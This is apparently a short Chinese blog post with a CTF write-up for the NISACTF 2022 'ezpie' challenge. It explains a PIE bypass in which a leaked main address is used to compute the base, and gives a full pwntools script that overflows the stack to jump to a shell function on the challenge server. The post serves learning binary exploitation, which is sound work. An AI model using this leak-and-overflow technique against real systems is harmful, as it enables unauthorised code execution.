PWN入门-ret2pie做题

发表于2024-01-26|更新于2024-01-26

|阅读量:

PWN入门-ret2pie做题

[NISACTF 2022]ezpie

PIE保护时基地址随机，先泄漏main地址，直接给了。计算偏移算shell函数地址。

from pwn import *
context(log_level='debug',os='linux',arch='i386')
p=remote("node5.anna.nssctf.cn",28166)
p.recvuntil("0x") #地址前缀0x
main_addr=int(p.recv(8),16) #8位地址以16进制形式读
p.recvuntil("Input:")
elf_base=main_addr-0x770 #计算偏移
stack_overflow=b'a'*(0x28+4)
shell_addr=p32(elf_base+0x80f) #求真实shell地址
payload1=flat([stack_overflow,shell_addr])
p.sendline(payload1)
p.interactive()

文章作者: Monoceros406

文章链接: http://monoceros.github.io/2024/01/26/PWN%E5%85%A5%E9%97%A8-ret2pie%E5%81%9A%E9%A2%98/

PWN